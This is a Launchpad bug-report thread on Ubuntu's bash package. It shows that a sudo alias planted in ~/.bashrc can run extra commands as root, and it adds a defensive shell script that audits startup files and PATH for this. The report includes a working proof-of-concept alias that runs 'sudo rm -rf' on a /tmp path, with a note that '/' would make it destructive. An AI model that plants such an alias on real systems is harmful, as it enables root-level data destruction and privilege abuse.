[Bug 1893241] Re: attack alias sudo with nasty payload
Patrik Nilsson
1893241 at bugs.launchpad.net
Sat Aug 29 20:25:53 UTC 2020
@seth-arnold
I agree with you that there are other things to address as well.
In the art of hacking you most probably get into a system via some kind
of service. You may have the privileges of a daemon. You then get
access to the first user account. You want to escalate privilege and you
search to find weaknesses. As a system owner you want as many layers of
protection as possible.
It is a weakness that the PATH-variable can be set without giving your
password, since an attacker can set their evil command before the one
you expect in the execution priority.
The same goes for the ALIAS-command. As demonstrated, they can help
compromise your system.
So you are right that there were more things to think about, but we all want
a system as safe as possible.
--
You received this bug notification because you are a member of Ubuntu
Foundations Bugs, which is subscribed to bash in Ubuntu.
https://bugs.launchpad.net/bugs/1893241
Title:
attack alias sudo with nasty payload
Status in bash package in Ubuntu:
Won't Fix
Bug description:
Put the alias below in ~/.bashrc, which is writable by the current
user, and wait for the user to open up a shell and become root.
There are numerous possibilities. If you exchange
"/tmp/aBSoLuTLYNoTHiNG" for "/" it becomes dangerous. Or imagine an
attacker that can't become root in any other way and wants to set up
a botnet.
$ alias sudo='function f() { sudo -- rm -rf "/tmp/aBSoLuTLYNoTHiNG" ; sudo touch "/tmp/aBSoLuTLYNoTHiNG" ; echo "Everything removed!!" ; sudo "$@" ; } ; f "$@"'
$ stat /tmp/aBSoLuTLYNoTHiNG
stat: cannot stat '/tmp/aBSoLuTLYNoTHiNG': No such file or directory
$ sudo echo 'hello wonderful world!'
Everything removed!!
hello wonderful world!
$ stat /tmp/aBSoLuTLYNoTHiNG
File: /tmp/aBSoLuTLYNoTHiNG
Size: 0 Blocks: 0 IO Block: 4096 regular empty file
Device: fd00h/64768d Inode: 4718664 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2020-08-27 18:09:50.960080579 +0200
Modify: 2020-08-27 18:09:50.960080579 +0200
Change: 2020-08-27 18:09:50.960080579 +0200
Birth: -
File written by root! Fastest fix: Sudo is not allowed to be an alias.
Extra information:
$ lsb_release -rd
Description: Ubuntu 20.04.1 LTS
Release: 20.04
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/bash/+bug/1893241/+subscriptions
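
An added example, not part of the bug report and not code from bash or sudo: a POSIX sh audit for the two weaknesses raised in this thread, namely startup-file aliases or functions named after a privilege-elevation command, and user-writable PATH directories searched before the real binary. The command list in `PRIV`, the function names and the sample startup file in `demo` are assumptions made for illustration.

```sh
#!/bin/sh
# Added example: audit for the alias and PATH weaknesses described above.
PRIV='sudo|su|doas|pkexec'        # assumption: commands worth protecting
B='(^|[;&[:space:]])'             # position where a command can start
RE="${B}alias[[:space:]]+($PRIV)="
RE="$RE|${B}(function[[:space:]]+)?($PRIV)[[:space:]]*\(\)"
RE="$RE|${B}function[[:space:]]+($PRIV)([[:space:]{]|\$)"

# scan_rc FILE: print "LINENO:LINE" for every non-comment line that defines
# an alias or function named after a privileged command. Exit status 0 if
# anything was found. Line-based heuristic; sourced files are not followed.
scan_rc() {
    grep -nE "$RE" "$1" | grep -vE '^[0-9]+:[[:space:]]*#'
}

# writable_before CMD PATHVALUE: print each directory in PATHVALUE that the
# current user can write to and that is searched before the directory that
# holds CMD. Exit status 0 if any was found. Runs in a subshell so the IFS
# and globbing changes do not leak into the caller.
writable_before() (
    found=1
    IFS=:; set -f
    for d in $2; do
        d=${d:-.}                       # empty entry = current directory
        if [ -f "$d/$1" ] && [ -x "$d/$1" ]; then break; fi
        if [ -d "$d" ] && [ -w "$d" ]; then echo "$d"; found=0; fi
    done
    [ "$found" -eq 0 ]
)

# demo: run scan_rc over a constructed startup file (not from the bug report).
demo() {
    rc=$(mktemp)
    printf '%s\n' "alias ll='ls -l'" "# alias sudo=x" \
        "alias sudo='echo wrapped; sudo'" "su() { echo wrapped; }" > "$rc"
    scan_rc "$rc"; status=$?
    rm -f "$rc"
    return $status
}

# Usage: sh audit.sh ~/.bashrc ~/.profile
for f in "$@"; do echo "== $f"; scan_rc "$f"; done
if [ $# -gt 0 ]; then writable_before sudo "$PATH"; fi
```

In an interactive bash session, `type -a sudo` gives the same answer for the live shell: it lists an alias or function ahead of the binary if one is defined.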